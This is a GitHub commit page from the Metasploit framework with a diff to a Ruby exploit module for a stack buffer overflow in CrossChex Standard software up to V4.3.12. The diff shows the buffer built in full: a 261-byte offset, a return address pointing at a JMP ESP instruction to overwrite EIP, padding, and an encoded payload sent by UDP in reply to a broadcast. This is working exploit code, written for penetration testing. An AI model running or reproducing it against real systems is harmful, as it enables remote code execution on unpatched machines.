Skip to content
Permalink
Browse files

Land #12902, Add exploit module for crosschex buffer overflow

  • Loading branch information
dwelch-r7 committed Feb 13, 2020
2 parents 0e55e20 + 2ca2b5c commit 07954c0ce214d4ba505a0ff514d6b3f7f2e9e865
Showing with 8 additions and 4 deletions.
  1. +8 −4 modules/exploits/windows/misc/crosschex_device_bof.rb
@@ -44,7 +44,11 @@ def initialize(info = {})
[
[
'Crosschex Standard x86 <= V4.3.12',
{}
{
'Offset' => 261, # Overwrites memory to allow EIP to be overwritten
'Ret' => "\x07\x18\x42\x00", # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
'Shift' => 4 # Positions payload to be written at beginning of ESP
}
]
],
'DefaultTarget' => 0
@@ -67,9 +71,9 @@ def exploit
end

print_status "CrossChex broadcast received, sending payload in response"
sploit = rand_text_english(261)
sploit << "\x07\x18\x42\x00" # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
sploit << rand_text_english(4) # Positions payload to be written at beginning of ESP
sploit = rand_text_english(target['Offset'])
sploit << target.ret # Overwrites EIP with address of 'JMP ESP' assembly command found in CrossChex data
sploit << rand_text_english(target['Shift']) # Positions payload to be written at beginning of ESP
sploit << payload.encoded

udp_sock.sendto(sploit, host, port)

0 comments on commit 07954c0

Please sign in to comment.
You can’t perform that action at this time.